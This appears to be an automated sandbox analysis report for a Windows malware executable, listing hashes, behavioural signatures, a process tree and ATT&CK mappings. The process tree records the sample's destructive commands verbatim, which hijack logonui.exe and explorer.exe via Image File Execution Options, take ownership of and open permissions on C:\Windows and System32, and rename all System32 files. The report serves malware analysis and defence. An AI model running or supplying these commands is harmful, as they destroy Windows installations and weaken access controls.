Overview

overview

8

Static

static

5

38674f024b...d6.exe

windows7_x64

8

38674f024b...d6.exe

windows10-2004_x64

8

Analysis

  • max time kernel
    173s
  • max time network
    181s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    11-05-2022 22:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe

  • Size

    865KB

  • MD5

    a11969b7f736f7613b76a2def8c51dbc

  • SHA1

    fa055058e2c1db2fb83ec6b7da9f1c41648889e3

  • SHA256

    38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6

  • SHA512

    9ff92c00a0a78786a2222082e3a3452f9d20249844b10cfc774849ad49e56904d9eddb0b3d3b25106bfe741d84fa685b16e15745ba304aaaeb02854bbe3705ec

Score
8/10
discoveryexploit

Malware Config

Signatures

  • Possible privilege escalation attempt 8 IoCs
    exploit
  • Modifies file permissions 1 TTPs 8 IoCs
    discovery
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe
    "C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3676
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:3180
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3536
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:4400
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im explorer.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\System32 /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4388
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4304
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4500
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\ /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\ /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:5008
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\System32\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2052
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ren C:\Windows\system32\*.* *.lolxxd
      2⤵
        PID:3068
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c taskkill /f /im explorer.exe
        2⤵
          PID:3628
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im explorer.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1072
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c takeown /f C:\Windows\System32\
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:320
          • C:\Windows\SysWOW64\takeown.exe
            takeown /f C:\Windows\System32\
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:3460
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c icacls C:\Windows\System32 /Grant Users:F
          2⤵
            PID:220
            • C:\Windows\SysWOW64\icacls.exe
              icacls C:\Windows\System32 /Grant Users:F
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:636
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c takeown /f C:\Windows\
            2⤵
              PID:1040
              • C:\Windows\SysWOW64\takeown.exe
                takeown /f C:\Windows\
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:4912
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c icacls C:\Windows\ /Grant Users:F
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3736
              • C:\Windows\SysWOW64\icacls.exe
                icacls C:\Windows\ /Grant Users:F
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:4700
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ren C:\Windows\system32\*.* *.lolxxd
              2⤵
                PID:2656
            • C:\Windows\SysWOW64\takeown.exe
              takeown /f C:\Windows\System32\
              1⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:3568

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            Privilege Escalation

            Defense Evasion

            File Permissions Modification

            1
            T1222

            Modify Registry

            1
            T1112

            Credential Access

            Discovery

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/220-147-0x0000000000000000-mapping.dmp
              Download
            • memory/320-146-0x0000000000000000-mapping.dmp
              Download
            • memory/636-153-0x0000000000000000-mapping.dmp
              Download
            • memory/1040-148-0x0000000000000000-mapping.dmp
              Download
            • memory/1072-154-0x0000000000000000-mapping.dmp
              Download
            • memory/1476-132-0x0000000000000000-mapping.dmp
              Download
            • memory/2052-133-0x0000000000000000-mapping.dmp
              Download
            • memory/2240-134-0x0000000000000000-mapping.dmp
              Download
            • memory/2656-155-0x0000000000000000-mapping.dmp
              Download
            • memory/3068-144-0x0000000000000000-mapping.dmp
              Download
            • memory/3180-137-0x0000000000000000-mapping.dmp
              Download
            • memory/3460-150-0x0000000000000000-mapping.dmp
              Download
            • memory/3536-131-0x0000000000000000-mapping.dmp
              Download
            • memory/3568-139-0x0000000000000000-mapping.dmp
              Download
            • memory/3628-145-0x0000000000000000-mapping.dmp
              Download
            • memory/3676-130-0x0000000000000000-mapping.dmp
              Download
            • memory/3736-149-0x0000000000000000-mapping.dmp
              Download
            • memory/4304-135-0x0000000000000000-mapping.dmp
              Download
            • memory/4388-142-0x0000000000000000-mapping.dmp
              Download
            • memory/4400-138-0x0000000000000000-mapping.dmp
              Download
            • memory/4500-141-0x0000000000000000-mapping.dmp
              Download
            • memory/4700-151-0x0000000000000000-mapping.dmp
              Download
            • memory/4804-136-0x0000000000000000-mapping.dmp
              Download
            • memory/4912-152-0x0000000000000000-mapping.dmp
              Download
            • memory/5008-140-0x0000000000000000-mapping.dmp
              Download
            • memory/5012-143-0x0000000000000000-mapping.dmp
              Download